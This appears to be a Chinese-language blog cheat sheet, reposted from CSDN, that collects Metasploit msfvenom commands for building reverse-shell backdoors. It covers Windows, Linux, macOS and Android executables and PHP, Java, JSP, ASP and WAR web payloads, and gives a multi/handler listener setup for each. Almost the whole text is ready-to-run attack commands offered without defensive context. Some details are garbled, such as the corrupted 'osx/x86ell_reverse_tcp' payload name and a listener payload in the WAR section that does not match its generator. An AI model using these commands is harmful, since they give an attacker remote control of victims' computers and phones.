MSF生成后门汇总

可执行脚本反弹shell

1.windows下exe执行文件后门    

msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe

监听设置:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

2.linux下执行文件后门

msfvenom -p linux/x86/shell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/linux_shell
需要给执行权限 chmod +x linux_shell

监听设置

msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

3.mac后门

msfvenom -p osx/x86ell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f macho > 文件路径/文件名
案例:msfvenom -p osx/x86ell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f macho > shell.macho

监听设置

msfconsole
use exploit/multi/handler
set payload osx/x86ell_reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

4.android后门

msfvenom -p android/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 R > 文件路径/文件名
案例:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.apk

手机安装apk文件点击执行

监听设置

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

webpayload

PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x>文件路径/文件名
案例:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x> shell.php

监听设置

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

2.java后门

msfvenom -p java/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >shell.jar

运行命令:java -jar shell.jar

监听设置

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

3.jsp后门

msfvenom -p java/jsp_shell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f raw >文件路径/文件名
案例:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f raw > shell.jsp

监听设置

msfconsole
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

4.asp后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f asp > 文件路径/文件名
案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f asp > shell.asp

监听设置

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

5.war后门

msfvenom -p java/jsp_shell_reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 -f war > shell.war
Scripting Payloads
案例:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.43.193 LPORT=4444 -f war > shell.war
Scripting Payloads

监听设置

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.193
set LPORT 4444
exploit

猜你喜欢

转载自blog.csdn.net/qq_42094992/article/details/109004560
msf
今日推荐